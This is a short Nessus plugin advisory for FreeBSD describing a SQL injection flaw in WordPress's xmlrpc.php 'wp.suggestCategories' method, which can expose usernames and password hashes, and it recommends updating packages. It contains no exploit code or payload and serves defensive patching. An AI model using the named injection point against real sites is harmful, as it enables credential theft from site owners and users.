FreeBSD : wordpress -- XMLRPC SQL Injection (0838733d-1698-11dc-a197-0011098b2f36)
Medium Nessus Plugin ID 25591
SynopsisThe remote FreeBSD host is missing one or more security-related updates.
DescriptionSecunia reports :
Slappter has discovered a vulnerability in WordPress, which can be exploited by malicious users to conduct SQL injection attacks.
Input passed to the 'wp.suggestCategories' method in xmlrpc.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Successful exploitation allows e.g. retrieving usernames and password hashes, but requires valid user credentials and knowledge of the database table prefix.
SolutionUpdate the affected packages.